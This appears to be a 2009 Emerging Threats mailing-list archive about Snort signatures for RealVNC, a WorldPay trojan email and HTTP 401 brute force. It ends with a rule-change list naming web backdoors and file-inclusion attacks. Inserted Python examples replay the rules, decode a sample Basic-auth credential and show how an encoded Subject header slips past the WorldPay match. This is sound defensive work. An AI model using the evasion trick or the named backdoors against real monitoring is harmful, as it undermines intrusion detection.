SIDs 2002922 + 2002920 are in the exploit category, even though they carry an ET POLICY label. Now, I'm aware there was that old RealVNC issue a long while back.
We should either move those sigs from EXPLOIT to the POLICY group, or perhaps remove these sigs altogether.

Thoughts?

Cheers,
Frank

-- 
It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.

From veerendragg at secpod.com Tue May 12 08:05:02 2009
From: veerendragg at secpod.com (Veerendra GG)
Date: Tue, 12 May 2009 17:35:02 +0530
Subject: [Emerging-Sigs] Signature on Malware E-mail
Message-ID: <4A0965EE.3040205@secpod.com>

# 12/05/2009 WorldPay Card Transactions - Trojan horse

alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"WorldPay Card Transactions - Trojan"; flow:established,to_server; content:"|0d 0a|Subject|3a| WorldPay CARD transaction Confirmation"; nocase; content:"WorldPay_CONFR.zip"; nocase; classtype:trojan-activity; reference:url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/; sid:9038; rev:1;)

-- 
regards,
Veerendra GG
http://www.secpod.com

From frank at knobbe.us Tue May 12 14:22:47 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 12 May 2009 13:22:47 -0500
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <4A0833B9.1040808@jonkmans.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com> <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com> <4A0833B9.1040808@jonkmans.com>
Message-ID: <1242152567.76343.20.camel@localhost>

On Mon, 2009-05-11 at 10:18 -0400, Matt Jonkman wrote:
> Good ideas Jack. I did that when I committed. One sig for individual
> hits, and a threshold to indicate some brute forcing.

The threshold is broken. It's thresholded on the source, not destination as required for this sig.

I'm gonna fix in a sec.

-Frank

From jonkman at jonkmans.com Tue May 12 14:24:15 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 12 May 2009 14:24:15 -0400
Subject: [Emerging-Sigs] Signature on Malware E-mail
In-Reply-To: <4A0965EE.3040205@secpod.com>
References: <4A0965EE.3040205@secpod.com>
Message-ID: <4A09BECF.6080406@jonkmans.com>

Good sig. I'll put it in current events for now, as it'll likely morph in the future.

Thanks!

matt

Veerendra GG wrote:
> # 12/05/2009 WorldPay Card Transactions - Trojan horse
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"WorldPay Card
> Transactions - Trojan"; flow:established,to_server; content:"|0d
> 0a|Subject|3a| WorldPay CARD transaction Confirmation"; nocase;
> content:"WorldPay_CONFR.zip"; nocase; classtype:trojan-activity;
> reference:url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/;
> sid:9038; rev:1;)

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Tue May 12 14:27:22 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 12 May 2009 14:27:22 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <1242152567.76343.20.camel@localhost>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com> <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com> <4A0833B9.1040808@jonkmans.com> <1242152567.76343.20.camel@localhost>
Message-ID: <4A09BF8A.8030909@jonkmans.com>

Ahh, ya. You're right. My mistake.

Matt

Frank Knobbe wrote:
> On Mon, 2009-05-11 at 10:18 -0400, Matt Jonkman wrote:
>> Good ideas Jack. I did that when I committed. One sig for individual
>> hits, and a threshold to indicate some brute forcing.
>
> The threshold is broken. It's thresholded on the source, not destination
> as required for this sig.
>
> I'm gonna fix in a sec.
>
> -Frank

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From pepperjack at afferentsecurity.com Tue May 12 15:47:59 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Tue, 12 May 2009 14:47:59 -0500
Subject: [Emerging-Sigs] RealVNC sigs 2002922 + 2002920
In-Reply-To: <1242090023.7228.257.camel@localhost>
References: <1242090023.7228.257.camel@localhost>
Message-ID: <20090512144759.vqqacfbwc0ssocgc@mail.afferentsecurity.com>

Quoting Frank Knobbe :
> SIDs 2002922 + 2002920 are in the exploit category, even though they
> carry an ET POLICY label. Now, I'm aware there was that old RealVNC issue
> a long while back. We should either move those sigs from EXPLOIT to the
> POLICY group, or perhaps remove these sigs altogether.

I lobby for putting them into the POLICY group. The rule does not detect an exploit, it detects an out-of-date or misconfigured VNC (policy).

jp

-- 
Framework? I don't need no stinking framework!
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com
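The two 401 signatures this thread produced (2009345 and the thresholded 2009346), replayed in Python as an added example that is not code from the thread or from the ET rule set. It covers Jack's two points (a threshold for the flurry, and the fact that a Basic-auth 401 means credentials cross the wire in the clear) and Frank's correction that the threshold has to track by destination: with `track by_src` the key is the web server, so one busy intranet site answering many legitimate clients trips the count (David's 2914 hits), while `track by_dst` keys on the client doing the guessing. The flow records, the 5-in-30-seconds threshold and the `WWW-Authenticate` scheme check are assumptions of the example; the base64 string is the one from Jack's message. Two details worth seeing in code: the rule's `content:"HTTP/1.1 401"; depth:12;` is a literal, so an HTTP/1.0 status line is not matched, and a 401 only proves clear-text credentials when the server asks for `Basic` (a `Digest` challenge does not expose the password).

```python
"""Added example: the 401 rules from the thread replayed over constructed records."""
import base64
import re


def _resp(version="1.1", scheme="Basic"):
    """Constructed 401 response; only the status line and WWW-Authenticate matter here."""
    return (f"HTTP/{version} 401 Unauthorized\r\n"
            f"WWW-Authenticate: {scheme} realm=\"test\"\r\n\r\n")


OK_RESP = "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"

# Constructed flow records: (seconds, server ip, client ip, server payload).
SAMPLE_RESPONSES = [
    # 10.0.0.5: a busy intranet site answering six *different* clients
    (0, "10.0.0.5", "192.168.1.10", _resp()),
    (3, "10.0.0.5", "192.168.1.11", _resp()),
    (6, "10.0.0.5", "192.168.1.12", _resp()),
    (9, "10.0.0.5", "192.168.1.13", _resp()),
    (12, "10.0.0.5", "192.168.1.14", _resp()),
    (15, "10.0.0.5", "192.168.1.15", _resp()),
    (16, "10.0.0.5", "192.168.1.10", OK_RESP),
    (18, "10.0.0.5", "192.168.1.16", _resp(version="1.0")),  # misses the depth:12 literal
    # 10.0.0.9: one external host retrying credentials six times in 20 seconds
    (20, "10.0.0.9", "198.51.100.7", _resp()),
    (24, "10.0.0.9", "198.51.100.7", _resp()),
    (28, "10.0.0.9", "198.51.100.7", _resp()),
    (32, "10.0.0.9", "198.51.100.7", _resp()),
    (36, "10.0.0.9", "198.51.100.7", _resp()),
    (40, "10.0.0.9", "198.51.100.7", _resp()),
    (41, "10.0.0.9", "198.51.100.7", OK_RESP),
    # 10.0.0.12 demands Digest: a 401, but no clear-text password crosses the wire
    (50, "10.0.0.12", "192.168.1.20", _resp(scheme="Digest")),
]

# Constructed client request carrying the base64 string from Jack's message.
SAMPLE_REQUEST = ("GET /admin/ HTTP/1.1\r\nHost: 10.0.0.9\r\n"
                  "Authorization: Basic amltYm9iOmNoZXNzZHVkZTQyCg==\r\n\r\n")


def matches_401(payload):
    """Equivalent of content:"HTTP/1.1 401"; depth:12; (a literal in the first 12 bytes)."""
    return payload[:12] == "HTTP/1.1 401"


def www_authenticate_scheme(payload):
    """Scheme the server demands ('Basic', 'Digest', ...), or None if no challenge."""
    m = re.search(r"^WWW-Authenticate:\s*(\w+)", payload, re.IGNORECASE | re.MULTILINE)
    return m.group(1) if m else None


def threshold_alerts(records, track="by_dst", count=5, seconds=30):
    """Replay the 401 rule under a simplified 'threshold: type both, track <track>':
    one alert per key when <count> matches fall inside a <seconds> window."""
    windows = {}  # key -> (window start, hits in window)
    alerts = []
    for ts, src, dst, payload in records:
        if not matches_401(payload):
            continue
        key = src if track == "by_src" else dst
        start, hits = windows.get(key, (ts, 0))
        if ts - start >= seconds:  # window expired: start a fresh one
            start, hits = ts, 0
        hits += 1
        windows[key] = (start, hits)
        if hits == count:  # fire once per window, when the count is reached
            alerts.append((ts, key))
    return alerts


def basic_auth_servers(records):
    """Servers whose 401 asks for Basic: over plain HTTP these see passwords in the clear."""
    return {src for _, src, _, p in records
            if matches_401(p) and (www_authenticate_scheme(p) or "").lower() == "basic"}


def decode_basic_credentials(request):
    """(user, password) from an 'Authorization: Basic' header, or None."""
    m = re.search(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", request,
                  re.IGNORECASE | re.MULTILINE)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return None
    user, _, password = raw.strip().partition(":")
    return user, password


if __name__ == "__main__":
    for track in ("by_src", "by_dst"):
        print(track, threshold_alerts(SAMPLE_RESPONSES, track=track))
    print("Basic-auth servers:", sorted(basic_auth_servers(SAMPLE_RESPONSES)))
    print("Credentials seen:", decode_basic_credentials(SAMPLE_REQUEST))
```

Run as-is, `by_src` reports both 10.0.0.5 (the false positive) and 10.0.0.9, while `by_dst` reports only the guessing client 198.51.100.7; the Digest server never appears in the clear-text list.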
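Veerendra's WorldPay signature above, re-implemented as an added example (Python; not Veerendra's or ET's code) over a constructed MIME message, to show what the two `content` matches actually see on port 25 and one way they are missed. The message, the `worldpay.example` addresses and the stand-in zip body are assumptions of the example. The raw byte match needs the Subject to appear literally after a CRLF; a mailer that emits the same subject as an RFC 2047 encoded word (`=?UTF-8?B?...?=`) defeats it, while a check that decodes the headers first still fires on both the subject and the attachment filename. Neither check sees anything once the MTA negotiates STARTTLS.

```python
"""Added example: the WorldPay rule's matches versus a decoded-header check."""
import base64
import email
from email.header import decode_header, make_header

SUBJECT = "WorldPay CARD transaction Confirmation"
ATTACHMENT = "WorldPay_CONFR.zip"
# Stand-in attachment body: the end-of-central-directory record of an empty zip.
# Constructed for the example; it is not the malware the rule was written for.
EMPTY_ZIP = b"PK\x05\x06" + b"\x00" * 18


def build_sample(subject_header):
    """Constructed SMTP DATA payload (CRLF line endings, as seen on port 25)
    carrying a zip attachment with the filename the rule keys on."""
    lines = [
        "From: \"WorldPay\" <service@worldpay.example>",
        "To: victim@example.net",
        f"Subject: {subject_header}",
        "MIME-Version: 1.0",
        "Content-Type: multipart/mixed; boundary=\"BOUNDARY\"",
        "",
        "--BOUNDARY",
        "Content-Type: text/plain; charset=us-ascii",
        "",
        "Please see the attached confirmation.",
        "--BOUNDARY",
        f"Content-Type: application/zip; name=\"{ATTACHMENT}\"",
        "Content-Transfer-Encoding: base64",
        f"Content-Disposition: attachment; filename=\"{ATTACHMENT}\"",
        "",
        base64.b64encode(EMPTY_ZIP).decode(),
        "--BOUNDARY--",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def rfc2047_subject(text):
    """The same subject as an RFC 2047 encoded word (legitimate for a mailer,
    convenient for a sender who wants to dodge a literal match)."""
    return "=?UTF-8?B?" + base64.b64encode(text.encode("utf-8")).decode() + "?="


def rule_content_match(raw):
    """Byte-for-byte equivalent of the rule's two content matches (both nocase):
    |0d 0a|Subject|3a| <subject>, and the attachment name anywhere in the stream."""
    stream = raw.lower()
    return (b"\r\nsubject: " + SUBJECT.lower().encode() in stream
            and ATTACHMENT.lower().encode() in stream)


def parsed_match(raw):
    """Decode the message first, then compare subject and attachment names;
    this survives encoded-word subjects that defeat the raw byte match."""
    msg = email.message_from_bytes(raw)
    subject = str(make_header(decode_header(msg.get("Subject", ""))))
    names = [part.get_filename() for part in msg.walk() if part.get_filename()]
    return (subject.strip().lower() == SUBJECT.lower()
            and any(n.lower() == ATTACHMENT.lower() for n in names))


if __name__ == "__main__":
    for label, raw in (("plain", build_sample(SUBJECT)),
                       ("encoded", build_sample(rfc2047_subject(SUBJECT))),
                       ("benign", build_sample("Your statement"))):
        print(f"{label:8} rule={rule_content_match(raw)} parsed={parsed_match(raw)}")
```

The plain message trips both checks, the encoded-subject variant only the decoded one, and a message with an unrelated subject neither; the filename match alone is still what holds up when the subject changes, which is why Matt expects the rule to morph.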
From emerging at emergingthreats.net Tue May 12 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 12 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090512200010.EB7A14504E@goliath.jonkmans.com>

[***] Results from Oinkmaster started Tue May 12 16:00:10 2009 [***]

[+++] Added rules: [+++]
2009347 - ET TROJAN Tigger.a/Syzor Checkin (emerging-virus.rules)
2009348 - ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan (emerging.rules)

[///] Modified active rules: [///]
2001621 - ET WEB Exploit Suspected PHP Injection Attack (emerging-web_sql_injection.rules)
2001810 - ET WEB Explit PHP remote file include exploit attempt (emerging-web_sql_injection.rules)
2002838 - ET WEB_SPECIFIC Google Search Appliance browsing the Internet (emerging-web_sql_injection.rules)
2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules)
2003520 - ET WEB EXPLOIT webCalendar Remote File include (emerging-web.rules)
2007611 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 (emerging-virus.rules)
2007612 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 (emerging-virus.rules)
2007613 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 (emerging-virus.rules)
2007614 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 (emerging-virus.rules)
2007950 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body (emerging-virus.rules)
2008142 - ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) (emerging-virus.rules)
2008278 - ET TROJAN Generic Raider Obfuscated VBScript (emerging-virus.rules)
2008379 - ET TROJAN Swizzor Checkin (kgen_up) (emerging-virus.rules)
2008973 - ET TROJAN onmuz.com Infection Activity (emerging-virus.rules)
2009126 - ET TROJAN Possible bot C&C Checkin (emerging-virus.rules)
2009156 - ET TROJAN Unknown Dropper Checkin (emerging-virus.rules)
2009306 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009307 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009308 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009309 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009310 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009311 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009312 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009313 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009314 - ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete (emerging-web.rules)
2009315 - ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite (emerging-web.rules)
2009316 - ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009317 - ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009318 - ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009319 - ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection (emerging-web_sql_injection.rules)
2009320 - ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion (emerging-web_sql_injection.rules)
2009321 - ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion (emerging-web_sql_injection.rules)
2009322 - ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution (emerging-web.rules)
2009323 - ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection (emerging-web_sql_injection.rules)
2009324 - ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009325 - ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009326 - ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009327 - ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009328 - ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution (emerging-web.rules)
2009329 - ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009330 - ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009331 - ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion (emerging-web_sql_injection.rules)
2009332 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion (emerging-web_sql_injection.rules)
2009333 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion (emerging-web_sql_injection.rules)
2009334 - ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite (emerging-web.rules)
2009335 - ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection (emerging-web_sql_injection.rules)
2009336 - ET WEB Possible Web Backdoor cfexec.cfm access (emerging-web.rules)
2009337 - ET WEB Possible Web Backdoor cmdasp.asp access (emerging-web.rules)
2009338 - ET WEB Possible Web Backdoor cmdasp.aspx access (emerging-web.rules)
2009339 - ET WEB Possible Web Backdoor simple-backdoor.php access (emerging-web.rules)
2009340 - ET WEB Possible Web Backdoor php-backdoor.php access (emerging-web.rules)
2009341 - ET WEB Possible Web Backdoor jsp-reverse.jsp access (emerging-web.rules)
2009342 - ET WEB Possible Web Backdoor perlcmd.cgi access (emerging-web.rules)
2009343 - ET WEB Possible Web Backdoor cmdjsp.jsp access (emerging-web.rules)
2009344 - ET WEB Possible Web Backdoor cmd-asp-5.1.asp access (emerging-web.rules)
2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)
2009346 - ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack (emerging-attack_response.rules)

[///] Modified inactive rules: [///]
2001716 - ET WEB_SPECIFIC IDN url seen.. (emerging-web_sql_injection.rules)

[---] Removed rules: [---]
2008505 - ET MALWARE Adaware.BarACE Checkin and Update (emerging-virus.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (60):
2001621 || ET WEB Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
2001716 || ET WEB_SPECIFIC IDN url seen..
|| url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716 2001810 || ET WEB Explit PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810 2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003520 || ET WEB EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957 2007611 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611 2007612 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612 2007613 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613 2007614 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614 2007950 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in 
Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950 2008142 || ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142 2008278 || ET TROJAN Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1 2008379 || ET TROJAN Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379 2008973 || ET TROJAN onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973 2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126 2009156 || ET TROJAN Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094 2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009306 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009307 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || 
url,doc.emergingthreats.net/2009308 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009309 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009310 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009311 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009312 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009313 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Orbit || url,doc.emergingthreats.net/2009314 || url,milw0rm.com/exploits/8257 || bugtraq,34200 2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PrecisionID || url,doc.emergingthreats.net/2009315 || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332 2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php 
cfgIncludeDirectory Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_YapBB || url,doc.emergingthreats.net/2009316 || bugtraq,30686 2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009317 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649 2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009318 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649 2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DeZine || url,doc.emergingthreats.net/2009319 || url,milw0rm.com/exploits/7722 || bugtraq,33194 2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009320 || url,milw0rm.com/exploits/7978 || bugtraq,33621 2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009321 || url,milw0rm.com/exploits/7978 || bugtraq,33621 2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_SupportSoft || url,doc.emergingthreats.net/2009322 || url,milw0rm.com/exploits/8160 || bugtraq,34004 2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009323 || url,milw0rm.com/exploits/8124 || bugtraq,33933 2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009324 || url,milw0rm.com/exploits/8124 || bugtraq,33933 2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009325 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009326 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009327 || ET 